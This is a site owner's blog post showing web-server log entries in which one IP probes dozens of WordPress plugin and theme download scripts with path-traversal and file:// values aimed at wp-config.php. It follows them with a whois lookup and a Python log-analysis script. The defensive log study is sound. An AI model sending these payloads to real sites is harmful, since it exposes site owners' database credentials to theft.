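Suspicious access to my web pages happens all the time, so when it gets in the way of log analysis, I block the entire IP address range at the firewall.
Today, too, the usual nuisance access shown below occurred. From left to right: line number (not part of the log), timestamp, IP address, URL, and referrer.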
557 [21/Aug/2016:04:55:29] - - 138.91.157.231 "GET //wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 404 1041 "-"
558 [21/Aug/2016:04:55:30] - - 138.91.157.231 "GET //wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php HTTP/1.1" 404 1041 "-"
559 [21/Aug/2016:04:55:30] - - 138.91.157.231 "GET //wp-content/plugins/contus-video-gallery/hdflvplayer/download.php?f=../../../../wp-config.php HTTP/1.1" 404 1041 "-"
560 [21/Aug/2016:04:55:31] - - 138.91.157.231 "GET //wp-content/themes/TheLoft/download.php?file=../../../wp-config.php HTTP/1.1" 404 1041 "-"
561 [21/Aug/2016:04:55:32] - - 138.91.157.231 "GET //wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php HTTP/1.1" 404 1041 "-"
562 [21/Aug/2016:04:55:32] - - 138.91.157.231 "GET //wp-content/themes/felis/download.php?file=../wp-config.php HTTP/1.1" 404 1041 "-"
563 [21/Aug/2016:04:55:33] - - 138.91.157.231 "GET //wp-content/themes/epic/includes/download.php?file=wp-config.php HTTP/1.1" 404 1041 "-"
564 [21/Aug/2016:04:55:33] - - 138.91.157.231 "GET //wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php HTTP/1.1" 404 1041 "-"
565 [21/Aug/2016:04:55:34] - - 138.91.157.231 "GET //wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php HTTP/1.1" 404 1041 "-"
566 [21/Aug/2016:04:55:34] - - 138.91.157.231 "GET //wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php HTTP/1.1" 404 1041 "-"
567 [21/Aug/2016:04:55:35] - - 138.91.157.231 "GET //wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php HTTP/1.1" 404 1041 "-"
568 [21/Aug/2016:04:55:35] - - 138.91.157.231 "GET //wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php HTTP/1.1" 404 1041 "-"
569 [21/Aug/2016:04:55:36] - - 138.91.157.231 "GET //wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php HTTP/1.1" 404 1041 "-"
570 [21/Aug/2016:04:55:36] - - 138.91.157.231 "GET //wp-content/themes/lote27/download.php?download=../../../wp-config.php HTTP/1.1" 404 1041 "-"
571 [21/Aug/2016:04:55:36] - - 138.91.157.231 "GET //wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php HTTP/1.1" 404 1041 "-"
572 [21/Aug/2016:04:55:37] - - 138.91.157.231 "GET //wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php HTTP/1.1" 404 1041 "-"
573 [21/Aug/2016:04:55:37] - - 138.91.157.231 "GET //wp-content/plugins/justified-image-grid/download.php?file=file:///C:/wamp/www/wp-config.php HTTP/1.1" 404 1041 "-"
574 [21/Aug/2016:04:55:38] - - 138.91.157.231 "GET //wp-content/plugins/justified-image-grid/download.php?file=file:///C:/xampp/htdocs/wp-config.php HTTP/1.1" 404 1041 "-"
575 [21/Aug/2016:04:55:39] - - 138.91.157.231 "GET //wp-content/plugins/history-collection/download.php?var=../../../wp-config.php HTTP/1.1" 404 1041 "-"
576 [21/Aug/2016:04:55:39] - - 138.91.157.231 "GET //wp-content/plugins/justified-image-grid/download.php?file=file:///var/www/wp-config.php HTTP/1.1" 404 1041 "-"
577 [21/Aug/2016:04:55:39] - - 138.91.157.231 "GET //wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php HTTP/1.1" 404 1041 "-"
578 [21/Aug/2016:04:55:40] - - 138.91.157.231 "GET //wp-content/force-download.php?file=../wp-config.php HTTP/1.1" 404 1041 "-"
579 [21/Aug/2016:04:55:40] - - 138.91.157.231 "GET //wp-content/plugins/ibs-mappro/lib/download.php?file=../../../../wp-config.php HTTP/1.1" 404 1041 "-"
580 [21/Aug/2016:04:55:40] - - 138.91.157.231 "GET //wp-content/themes/SMWF/inc/download.php?file=../wp-config.php HTTP/1.1" 404 1041 "-"
581 [21/Aug/2016:04:55:41] - - 138.91.157.231 "GET //force-download.php?file=../wp-config.php HTTP/1.1" 404 1041 "-"
582 [21/Aug/2016:04:55:41] - - 138.91.157.231 "GET //wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr HTTP/1.1" 404 1041 "-"
583 [21/Aug/2016:04:55:41] - - 138.91.157.231 "GET //wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?path=../../../../../../../wp-config.php HTTP/1.1" 404 1041 "-"
584 [21/Aug/2016:04:55:42] - - 138.91.157.231 "GET //wp-content/themes/markant/download.php?file=../../wp-config.php HTTP/1.1" 404 1041 "-"
585 [21/Aug/2016:04:55:42] - - 138.91.157.231 "GET //wp-content/themes/yakimabait/download.php?file=./wp-config.php HTTP/1.1" 404 1041 "-"
586 [21/Aug/2016:04:55:43] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 301 - "-"
587 [21/Aug/2016:04:55:47] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 404 50776 "-"
588 [21/Aug/2016:04:55:52] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php HTTP/1.1" 301 - "-"
589 [21/Aug/2016:04:55:55] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php HTTP/1.1" 404 50776 "-"
590 [21/Aug/2016:04:55:59] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/plugins/contus-video-gallery/hdflvplayer/download.php?f=../../../../wp-config.php HTTP/1.1" 301 - "-"
591 [21/Aug/2016:04:56:01] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/plugins/contus-video-gallery/hdflvplayer/download.php?f=../../../../wp-config.php HTTP/1.1" 404 50776 "-"
592 [21/Aug/2016:04:56:05] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/TheLoft/download.php?file=../../../wp-config.php HTTP/1.1" 301 - "-"
593 [21/Aug/2016:04:56:07] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/TheLoft/download.php?file=../../../wp-config.php HTTP/1.1" 404 50776 "-"
594 [21/Aug/2016:04:56:12] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/felis/download.php?file=../wp-config.php HTTP/1.1" 301 - "-"
595 [21/Aug/2016:04:56:14] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/felis/download.php?file=../wp-config.php HTTP/1.1" 404 50776 "-"
596 [21/Aug/2016:04:56:18] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php HTTP/1.1" 301 - "-"
597 [21/Aug/2016:04:56:21] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php HTTP/1.1" 404 50776 "-"
598 [21/Aug/2016:04:56:25] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php HTTP/1.1" 301 - "-"
599 [21/Aug/2016:04:56:27] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php HTTP/1.1" 404 50776 "-"
600 [21/Aug/2016:04:56:31] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/epic/includes/download.php?file=wp-config.php HTTP/1.1" 301 - "-"
601 [21/Aug/2016:04:56:33] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/epic/includes/download.php?file=wp-config.php HTTP/1.1" 404 50776 "-"
602 [21/Aug/2016:04:56:45] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php HTTP/1.1" 301 - "-"
603 [21/Aug/2016:04:56:47] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php HTTP/1.1" 404 50776 "-"
604 [21/Aug/2016:04:56:51] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php HTTP/1.1" 301 - "-"
605 [21/Aug/2016:04:56:54] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php HTTP/1.1" 404 50776 "-"
606 [21/Aug/2016:04:56:58] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php HTTP/1.1" 301 - "-"
607 [21/Aug/2016:04:57:00] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php HTTP/1.1" 404 50776 "-"
608 [21/Aug/2016:04:57:09] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php HTTP/1.1" 301 - "-"
609 [21/Aug/2016:04:57:11] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php HTTP/1.1" 404 50776 "-"
610 [21/Aug/2016:04:57:15] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/lote27/download.php?download=../../../wp-config.php HTTP/1.1" 301 - "-"
611 [21/Aug/2016:04:57:18] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/lote27/download.php?download=../../../wp-config.php HTTP/1.1" 404 50776 "-"
612 [21/Aug/2016:04:57:22] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php HTTP/1.1" 301 - "-"
613 [21/Aug/2016:04:57:24] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php HTTP/1.1" 404 50776 "-"
614 [21/Aug/2016:04:57:28] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php HTTP/1.1" 301 - "-"
615 [21/Aug/2016:04:57:31] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php HTTP/1.1" 404 50776 "-"
616 [21/Aug/2016:04:57:35] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php HTTP/1.1" 301 - "-"
617 [21/Aug/2016:04:57:37] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php HTTP/1.1" 404 50776 "-"
618 [21/Aug/2016:04:57:41] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/plugins/justified-image-grid/download.php?file=file:///C:/wamp/www/wp-config.php HTTP/1.1" 301 - "-"
619 [21/Aug/2016:04:57:46] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/plugins/justified-image-grid/download.php?file=file:///C:/wamp/www/wp-config.php HTTP/1.1" 404 50776 "-"
620 [21/Aug/2016:04:57:50] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/plugins/justified-image-grid/download.php?file=file:///C:/xampp/htdocs/wp-config.php HTTP/1.1" 301 - "-"
621 [21/Aug/2016:04:57:52] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/plugins/justified-image-grid/download.php?file=file:///C:/xampp/htdocs/wp-config.php HTTP/1.1" 404 50776 "-"
622 [21/Aug/2016:04:57:56] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/plugins/justified-image-grid/download.php?file=file:///var/www/wp-config.php HTTP/1.1" 301 - "-"
623 [21/Aug/2016:04:57:59] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/plugins/justified-image-grid/download.php?file=file:///var/www/wp-config.php HTTP/1.1" 404 50776 "-"
624 [21/Aug/2016:04:58:03] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php HTTP/1.1" 301 - "-"
625 [21/Aug/2016:04:58:05] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php HTTP/1.1" 404 50776 "-"
626 [21/Aug/2016:04:58:09] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/plugins/history-collection/download.php?var=../../../wp-config.php HTTP/1.1" 301 - "-"
627 [21/Aug/2016:04:58:12] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/plugins/history-collection/download.php?var=../../../wp-config.php HTTP/1.1" 404 50776 "-"
628 [21/Aug/2016:04:58:15] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/SMWF/inc/download.php?file=../wp-config.php HTTP/1.1" 301 - "-"
629 [21/Aug/2016:04:58:18] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/SMWF/inc/download.php?file=../wp-config.php HTTP/1.1" 404 50776 "-"
630 [21/Aug/2016:04:58:22] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/force-download.php?file=../wp-config.php HTTP/1.1" 301 - "-"
631 [21/Aug/2016:04:58:24] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/force-download.php?file=../wp-config.php HTTP/1.1" 404 50776 "-"
632 [21/Aug/2016:04:58:28] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/plugins/ibs-mappro/lib/download.php?file=../../../../wp-config.php HTTP/1.1" 301 - "-"
633 [21/Aug/2016:04:58:31] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/plugins/ibs-mappro/lib/download.php?file=../../../../wp-config.php HTTP/1.1" 404 50776 "-"
634 [21/Aug/2016:04:58:35] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//force-download.php?file=../wp-config.php HTTP/1.1" 301 - "-"
635 [21/Aug/2016:04:58:43] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/force-download.php?file=../wp-config.php HTTP/1.1" 404 50776 "-"
636 [21/Aug/2016:04:58:48] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr HTTP/1.1" 301 - "-"
637 [21/Aug/2016:04:58:51] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr HTTP/1.1" 404 50776 "-"
638 [21/Aug/2016:04:58:55] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?path=../../../../../../../wp-config.php HTTP/1.1" 301 - "-"
639 [21/Aug/2016:04:58:57] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?path=../../../../../../../wp-config.php HTTP/1.1" 404 50776 "-"
640 [21/Aug/2016:04:59:02] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/markant/download.php?file=../../wp-config.php HTTP/1.1" 301 - "-"
641 [21/Aug/2016:04:59:05] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/markant/download.php?file=../../wp-config.php HTTP/1.1" 404 50776 "-"
642 [21/Aug/2016:04:59:09] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/yakimabait/download.php?file=./wp-config.php HTTP/1.1" 301 - "-"
643 [21/Aug/2016:04:59:11] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/yakimabait/download.php?file=./wp-config.php HTTP/1.1" 404 50776 "-"
When I looked up which country this IP address, 138.91.157.231, belongs to...
NetRange: 138.91.0.0 - 138.91.255.255
CIDR: 138.91.0.0/16
NetName: MICROSOFT
NetHandle: NET-138-91-0-0-1
Parent: NET138 (NET-138-0-0-0-0)
NetType: Direct Assignment
OriginAS:
Organization: Microsoft Corp (MSFT-Z)
RegDate: 2011-06-22
Updated: 2013-08-20
Ref: https://whois.arin.net/rest/net/NET-138-91-0-0-1
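It was Microsoft.
I don't think Microsoft as a company is doing this sort of thing, but there are people in there who do. It might also be an affiliated company or a customer to which the IP address range is leased.
I considered contacting abuse, but companies like this typically never reply with so much as a "Thank you", so I'm skipping the report. I'll just expose it here.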
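The following Python example is added here and is not the author's own code. It parses entries in the log format shown above (without the leading line number), counts per source IP the requests whose query string points at wp-config.php, flags any that were answered with a 2xx status, and checks which sources a firewall rule for the whois CIDR would cover. The last two sample entries (documentation IP addresses) and all function names are constructed for illustration.

```python
import ipaddress
import re
from collections import Counter
from urllib.parse import parse_qsl

# Field order used on this page: [timestamp] - - ip "request" status size "referrer"
LINE_RE = re.compile(
    r'\[(?P<ts>[^\]]+)\] \S+ \S+ (?P<ip>\S+) '
    r'"(?P<method>\S+) (?P<url>.*) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referrer>[^"]*)"'
)

# Three entries copied from the page, then two constructed ones (documentation IPs).
SAMPLE_LOG = """\
[21/Aug/2016:04:55:29] - - 138.91.157.231 "GET //wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 404 1041 "-"
[21/Aug/2016:04:55:37] - - 138.91.157.231 "GET //wp-content/plugins/justified-image-grid/download.php?file=file:///C:/wamp/www/wp-config.php HTTP/1.1" 404 1041 "-"
[21/Aug/2016:04:55:43] - - 138.91.157.231 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 301 - "-"
[21/Aug/2016:05:10:02] - - 192.0.2.10 "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/ HTTP/1.1" 200 50776 "-"
[21/Aug/2016:05:12:40] - - 203.0.113.5 "GET /wp-content/force-download.php?file=..%2Fwp-config.php HTTP/1.1" 200 3120 "-"
""".splitlines()

def is_config_probe(url):
    """True when any query-string value refers to wp-config.php."""
    # Split on "?" by hand: urlsplit() would read the leading "//" as a host.
    query = url.partition("?")[2]
    return any("wp-config.php" in value.lower()
               for _name, value in parse_qsl(query, keep_blank_values=True))

def analyze(lines):
    """Return (probe count per source IP, probes answered with a 2xx status)."""
    probes, served = Counter(), []
    for line in lines:
        m = LINE_RE.search(line)
        if not m or not is_config_probe(m["url"]):
            continue
        probes[m["ip"]] += 1
        if m["status"].startswith("2"):  # the file may have been disclosed
            served.append((m["ip"], m["url"]))
    return probes, served

def sources_in_block(probes, cidr):
    """Probing IPs that a firewall rule for `cidr` would cover."""
    net = ipaddress.ip_network(cidr)
    return sorted(ip for ip in probes if ipaddress.ip_address(ip) in net)

if __name__ == "__main__":
    counts, hits = analyze(SAMPLE_LOG)
    print(dict(counts), hits, sources_in_block(counts, "138.91.0.0/16"))
```

Every entry in the log above was answered with 404 or 301, so nothing was served; a 2xx answer to one of these requests is the case that warrants rotating the database credentials and keys stored in wp-config.php.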